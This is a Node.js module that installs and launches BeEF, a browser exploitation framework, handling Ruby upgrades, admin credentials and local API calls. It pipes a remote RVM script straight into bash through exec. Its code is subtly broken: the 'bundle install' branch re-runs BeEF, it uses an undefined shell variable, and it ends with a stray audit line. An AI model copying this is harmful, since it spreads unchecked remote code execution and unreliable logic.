// Function to prompt for new credentials
function promptForCredentials() {
    const rl = readline.createInterface({
        input: process.stdin,
        output: process.stdout
    });

    return new Promise((resolve) => {
        rl.question('Enter new BeEF username: ', (username) => {
            rl.question('Enter new BeEF password: ', (password) => {
                rl.close();
                resolve({ username, password });
            });
        });
    });
}

// Function to start BeEF
exports.startBeEF = function() {
    return new Promise((resolve, reject) => {
        // Check Ruby version before starting BeEF
        exec('ruby -v', (error, stdout, stderr) => {
            if (error) {
                return reject(`Error checking Ruby version: ${error.message}`);
            }

            const rubyVersionMatch = stdout.match(/ruby (\d+\.\d+\.\d+)/);
            const currentRubyVersion = rubyVersionMatch ? parseFloat(rubyVersionMatch[1]) : null;

            // If Ruby version is less than 3.0, install/update RVM and Ruby
            if (currentRubyVersion && currentRubyVersion < 3.0) {
                console.log(`Current Ruby version is ${currentRubyVersion}. Upgrading to Ruby 3.1.0...`);

                // Install RVM
                exec('curl -sSL https://get.rvm.io | bash', { shell: '/bin/bash' }, (error) => {
                    if (error) {
                        return reject(`Error installing RVM: ${error.message}`);
                    }

                    // Load RVM and install Ruby 3.1.0
                    exec('source ~/.rvm/scripts/rvm && rvm install 3.1.0', { shell: '/bin/bash' }, (error) => {
                        if (error) {
                            return reject(`Error installing Ruby 3.1.0: ${error.message}`);
                        }

                        // Ruby 3.1.0 installed, now start BeEF
                        runBeEF();
                    });
                });
            } else {
                // Ruby version is good, start BeEF
                runBeEF();
            }
        });

        // Helper function to start BeEF
        function runBeEF() {
            console.log('Starting BeEF...');
            exec(`cd ${BEEF_DIR} && ./beef`, { shell: '/bin/bash' }, (error, stdout, stderr) => {
                if (error) {
                    if (stderr.includes("Could not find") && stderr.includes("in any of the sources")) {
                        console.log("BeEF needs requirements that aren't installed. Installing...");
                        // Run bundle install to install missing gems
                        exec(`cd ${BEEF_DIR} && ./beef`, { shell: shell }, (error, stdout, stderr) => {
                            if (error) {
                                return reject(`Error running bundle install: ${error.message}`);
                            }

                            // Attempt to run BeEF again
                            console.log('Retrying to start BeEF...');
                            exec(`cd ${BEEF_DIR} && ./beef`, { shell: '/bin/bash' }, (error, stdout, stderr) => {
                                handleBeEFOutput(error, stdout, stderr);
                            });
                        });
                    } else {
                        handleBeEFOutput(error, stdout, stderr);
                    }
                } else {
                    console.log('BeEF started successfully. You can access it at http://localhost:3000');
                    resolve();
                }
            });
        }

        // Helper function to handle BeEF output
        function handleBeEFOutput(error, stdout, stderr) {
            // Log standard output and standard error for debugging
            console.log('STDOUT:', stdout);
            console.log('STDERR:', stderr);

            if (stderr.includes("Warning: System language") || stderr.includes("ERROR: Default username and password in use!")) {
                if (stderr.includes("ERROR: Default username and password in use!")) {
                    console.log('BeEF needs a different username and password. Updating config.yaml...');
                    promptForCredentials().then(({ username, password }) => {
                        updateCredentials(username, password);
                        console.log('Credentials updated. Starting BeEF again...');
                        exec(`cd ${BEEF_DIR} && ./beef`, { shell: '/bin/bash' }, (error) => {
                            if (error) {
                                return reject(`Error starting BeEF with new credentials: ${error.message}`);
                            }
                            console.log('BeEF started successfully. You can access it at http://localhost:3000');
                            resolve();
                        });
                    });
                } else {
                    console.log("Warning: System language $LANG '' does not appear to be UTF-8 compatible.");
                    resolve(); // Resolve without restarting BeEF if it's just a warning
                }
            } else {
                return reject(`Error starting BeEF: ${error.message}`);
            }
        }
    });
};

// Function to interact with BeEF API
exports.interactWithBeEF = async function(endpoint) {
    try {
        const response = await axios.get(`http://localhost:${BEEF_PORT}/${endpoint}`);
        console.log('Response from BeEF:', response.data);
    } catch (error) {
        console.error('Error interacting with BeEF:', error.message);
    }
};

// Function to print a message
exports.printMsg = function() {
    console.log("This is a message from the BeEN package.");
};

// Main function to install and start BeEF (optional)
async function main() {
    try {
        await exports.installBeEF();
        await exports.startBeEF();
        console.log('BeEF is running. You can interact with it now.');
        
        // Example interaction with BeEF (replace with actual endpoint if necessary)
        await exports.interactWithBeEF('api/your-endpoint');  // Replace with valid endpoint
    } catch (error) {
        console.error(error);
    }
}

// Uncomment the line below to run the main function when executing the script directly
// main();
1,178 vulnerabilities